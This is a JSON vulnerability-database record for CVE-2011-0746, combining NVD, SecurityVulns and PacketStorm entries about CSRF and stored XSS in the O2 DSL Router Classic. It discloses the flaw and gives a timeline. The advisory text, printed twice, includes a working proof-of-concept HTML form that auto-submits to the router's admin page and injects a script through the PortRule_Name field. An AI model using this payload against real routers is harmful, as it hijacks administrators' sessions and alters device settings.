{"cve": [{"lastseen": "2021-02-02T05:50:59", "description": "Cross-site request forgery (CSRF) vulnerability in Forms/PortForwarding_Edit_1 on the ZyXEL O2 DSL Router Classic allows remote attackers to hijack the authentication of administrators for requests that insert cross-site scripting (XSS) sequences via the PortRule_Name parameter.", "edition": 4, "cvss3": {}, "published": "2011-04-13T14:55:00", "title": "CVE-2011-0746", "type": "cve", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0746"], "modified": "2018-10-09T19:29:00", "cpe": ["cpe:/h:zyxel:o2_dsl_router_classic:*"], "id": "CVE-2011-0746", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0746", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:h:zyxel:o2_dsl_router_classic:*:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "cvelist": ["CVE-2011-0746", "CVE-2010-1482"], "description": "O2 classic router: persistent cross site scripting (XSS) and cross site\r\nrequest forgery (CSRF)\r\n\r\nReferences\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1482\r\nhttp://int21.de/cve/CVE-2011-0746-o2-router.html\r\n\r\nDescription\r\n\r\nThe default DSL router shipped by the german company O2 is completely\r\nvulnerable to persistent cross site scripting (XSS) and cross site\r\nrequest forgery (CSRF). The device is produced by ZyXEL, it seems it\r\nhas no other name than the brand "O2 DSL Router Classic".\r\n\r\nAs an example, the form at /Forms/PortForwarding_Edit_1 accepts\r\njavascript code for the parameter PortRule_Name, which will be\r\npermanently stored. Also, the form has no protection against CSRF.\r\n\r\nA sample code that will inject permanent javascript when called by a\r\nuser who is logged into his router:\r\n\r\n<form id="form1" method="post"\r\naction="http://192.168.1.1/Forms/PortForwarding_Edit_1"> <input\r\nname="PortRule_Name" value='"><script>alert(7)</script>'> <input\r\nname="PortRule_SPort" value="77"> <input name="PortRule_EPort"\r\nvalue="77"> <input name="PortRule_SrvAddr" value="10.0.0.1" >\r\n<script>\r\nvar frm = document.getElementById("form1");\r\nfrm.submit();\r\n</script>\r\nThis is just an example, all forms in the router interface are\r\nvulnerable to CSRF and, if they accept text input, to XSS.\r\n\r\nThe vulnerability has been disclosed to O2 in advance without any reply.\r\n\r\nDisclosure Timeline\r\n\r\n2011-02-03: Vendor contacted\r\n2011-04-07: Published advisory\r\n\r\nThis vulnerability was discovered by Hanno Boeck, http://www.hboeck.de,\r\nof schokokeks.org webhosting.\r\n\r\n ", "edition": 1, "modified": "2011-04-11T00:00:00", "published": "2011-04-11T00:00:00", "id": "SECURITYVULNS:DOC:26092", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26092", "title": "O2 classic router: persistent cross site scripting (XSS) and cross site request forgery (CSRF)", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:17", "description": "", "published": "2011-04-07T00:00:00", "type": "packetstorm", "title": "O2 Classic Router Cross Site Request Forgery / Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0746", "CVE-2010-1482"], "modified": "2011-04-07T00:00:00", "id": "PACKETSTORM:100172", "href": "https://packetstormsecurity.com/files/100172/O2-Classic-Router-Cross-Site-Request-Forgery-Cross-Site-Scripting.html", "sourceData": "`O2 classic router: persistent cross site scripting (XSS) and cross site \nrequest forgery (CSRF) \n \nReferences \n \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1482 \nhttp://int21.de/cve/CVE-2011-0746-o2-router.html \n \nDescription \n \nThe default DSL router shipped by the german company O2 is completely \nvulnerable to persistent cross site scripting (XSS) and cross site \nrequest forgery (CSRF). The device is produced by ZyXEL, it seems it \nhas no other name than the brand \"O2 DSL Router Classic\". \n \nAs an example, the form at /Forms/PortForwarding_Edit_1 accepts \njavascript code for the parameter PortRule_Name, which will be \npermanently stored. Also, the form has no protection against CSRF. \n \nA sample code that will inject permanent javascript when called by a \nuser who is logged into his router: \n \n<form id=\"form1\" method=\"post\" \naction=\"http://192.168.1.1/Forms/PortForwarding_Edit_1\"> <input \nname=\"PortRule_Name\" value='\"><script>alert(7)</script>'> <input \nname=\"PortRule_SPort\" value=\"77\"> <input name=\"PortRule_EPort\" \nvalue=\"77\"> <input name=\"PortRule_SrvAddr\" value=\"10.0.0.1\" > \n<script> \nvar frm = document.getElementById(\"form1\"); \nfrm.submit(); \n</script> \nThis is just an example, all forms in the router interface are \nvulnerable to CSRF and, if they accept text input, to XSS. \n \nThe vulnerability has been disclosed to O2 in advance without any reply. \n \nDisclosure Timeline \n \n2011-02-03: Vendor contacted \n2011-04-07: Published advisory \n \nThis vulnerability was discovered by Hanno Boeck, http://www.hboeck.de, \nof schokokeks.org webhosting. \n \n \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/100172/o2classic-xssxsrf.txt"}]}
